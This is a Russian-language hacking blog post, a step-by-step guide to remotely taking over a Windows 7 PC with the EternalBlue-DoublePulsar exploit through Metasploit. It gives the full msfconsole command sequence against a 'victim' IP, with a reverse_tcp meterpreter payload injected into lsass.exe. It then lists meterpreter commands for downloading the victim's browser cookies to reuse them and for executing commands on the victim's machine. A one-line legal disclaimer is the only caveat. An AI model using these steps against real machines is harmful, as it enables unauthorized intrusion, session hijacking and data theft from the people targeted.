#Новости #PC Удаленный взлом пк. Гайд


Удаленный взлом пк.


Хакерская тематика

Обучайтесь с нами! Мы в Telegram: https://t.me/joinchat/AAAAAEvqsQQCbVnDjA_vqA
1. Группа Вконтакте: https://vk.com/hackyouhack
2. Blogger: https://hackyouhack1.blogspot.com/
3. Vimeo: https://vimeo.com/hackyouhack

Сегодня я постараюсь вам доступным языком обьяснить и пошагово дать инструкцию, как всё же использовать данный эксплоит в своих целях.
upd: Я никого не побуждаю к действиям. Всё это противозоконно, если вы делайте это в своих корыстных целях​
На сегодняшний день я не очень то и много нашёл информации по поводу подробной установки Kali linux на ваше устройтво и установку Eternalblue-Doublepulsar(у меня флешка, если вы ставите её на основной жёсткий диск, то ёбли с флешкой вы сможете избежать) Этот способ не 100%-ый т.к. работает на уязвимости порта 445. Я уже писал статью, но сейчас будет подробная пошагавая инструкция исходя из моих опытов. Если у вас вылезла ошибка, я постараюсь ответить и помочь вам.

Итак приступим.​
Нам потребуется: Прямые руки + Интернет (желательно быстрый)

С самого начала скачиваем iso файл Kali linux с офф. сайта
После мы открываем Rufus и выбираем устройство, после во второй строке выбираем "MBR для компьютеров с UEFI" - Ставим мы его потому что некоторые версии BIOS не видят флешки с "MBR для компьютеров с BIOS или UEFI". Сам сталкивался с такой проблемой.
Потом жмём на дисковод рядом с строкой "FreeDOS" и выбираем путь до нашего Kali Linux.iso
Соглашаемся с тем, что мы потеряем все данные на флешке и начнётся установка.
После у нас есть уже сам Kali linux на флешке! Но! Что бы сохранять файлы на нём нужно сделать ещё один раздел под названием persistence и с файловой системой Ext4. Можно сделать это как и в линуксе, так и с виндой. Мой выбор пал на программу MiniTool Partition Wizard
Скачиваем бесплатную версию и в меню выбираем MiniTool Partition Wizard Free
После разделяем флешку на 2 части, на одной у нас будет система, на другой будут храниться файлы, которые были скачаны на Kali linux'е.
Создаём раздел persistence с файловой системой Ext4 и ждём.
И так. Загружаемся с биоса и выбираем флешку. И в загрузочном меню сначала выбирайте версию Live.
После загрузки вас поприветствует приятный интерфейс Kali linux. Но, нам нужно прописать пару команд, без которых у нас ничего сохраняться не будет.
Код:
fdisk -l

Мы смотрим под каким названием у нас находится раздел persistence
После как мы найдём его пишем следующее... (У меня лично пишет /dev/sdb2, у вас скорее всего будет по другому)
Код:
mkdir -p /mnt/sdb2
mount /dev/sdb2 /mnt/sdb2
echo "/ union" > /mnt/sdb2/persistence.conf
umount /dev/sdb2
reboot

И после перезагрузки мы выбираем тертью строку с persistence.
Хорошо, теперь у нас есть флешка с Kali linux, которая сохраняет все файлы. Далее нам нужно установить wine для работы с EternalBlue-Doublepulsar.
Пишем в консоли
Код:
wine

И он нам пишет
Код:
it looks like multiarch needs to be enabled. as root, please execute "dpkg --add-architecture i386 && apt-get update && apt-get install wine32"
 Usage: wine PROGRAM.... и т.д.

Из вышесказанного сообщения нам нужно прописать в консольКод:
dpkg --add-architecture i386 && apt-get update && apt-get install wine32

Лично у меня 16гб флешка и с 4мб/сек устанавливалось всё это добро около 2-х или трёх часов. Но того стоило (флешка старая, у вас должно быть быстрее)
После установки компонентов пишем снова в консоль
Код:
wine


После он не должен писать насчёт установки wine32.
Хорошо, дальше нам нужно установить сам EternalBlue-DoublePulsar 
ПишемКод:
git clone https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit.git


и ждём установки файлов.
Далее нам нужно закинуть это в путь /root/.msf4/modules/exploits/windows/smb/ Для открытия скрытых файлов в Linux просто нажмите комбинацию клавиш ctrl + h. Если у вас нету папки .msf4 то пропишите в консоль
Код:
msfconsole


И если у вас нет данных папок /exploits/windows/smb/, то создайте их вручную и СКОПИРУЙТЕ! туда следующие файлы (eternalblue_doublepulsar.rb, deps)
После открываем снова
Код:
msfconsole


и ждём загрузки.
После выполняем ряд следующих комманд, и да, нам нужно узнать ip адресс жертвы, я лично использовал на Linux ifconfig, а для жертвы на телефоне прилождение Fing.
Для примера возьмём наш ip => 192.168.0.3
А для жертвы придумаем => 192.168.0.8
Поехали
Код:
msfconsole
use auxiliary/scanner/smb/smb_ms17_010
set rhosts 192.168.0.108
run
(Тут он пишет, что всё ок)
use exploit/windows/smb/eternalblue-doublepulsar
set rhost 192.168.0.108
set lhost 192.168.0.103
set targetarchitecture x64(x86)
set windows/x64/meterpreter/reverse_tcp
set processinject lsass.exe
run


Ах да, чуть не забыл, у вас изначально не будет директорииКод:
mkdir -p /root/.wine/drive_c


- вы должны создать её самостоятельно написав следующее
Всё! У вас появится доступ к чужому компьютеру (Тестировалось на операционной системе Windows 7 x64 ultimate)
Вот некоторые команды meterpreter для использования:
Download - загружает с удалённого компьютера на ваш файлы, например вам нужно скачать куки браузера, что бы потом уже использовать их, тогд вы пишетеКод:
downlaod c:/users/...... (место хранения куки и сам файл куки или папку, где есть этот файл)


Команда "help", как и может ожидаться, отображает меню помощи "Meterpreter".
Команда ‘background‘ переводит текущую сессию Meterpreter в фоновый режим, и мы возвращаемся в командную строку "msf". Для того чтобы вернуться в сессии Meterpreter, просто необходимо обратится к ней снова.
Команда "edit" открывает файл, расположенный на целевом хосте. Он использует "vim" и все доступные команды данного редактора.
Команда "execute" запускает команду на целевом компьютере.
Остальной список базовых команд вы сможете найти на сайте http://www.stanovlenie.org.ua/meterpreter-basic-commands/ 

Обучайтесь с нами! Мы в Telegram: https://t.me/joinchat/AAAAAEvqsQQCbVnDjA_vqA
1. Группа Вконтакте: https://vk.com/hackyouhack
2. Blogger: https://hackyouhack1.blogspot.com/
3. Vimeo: https://vimeo.com/hackyouhack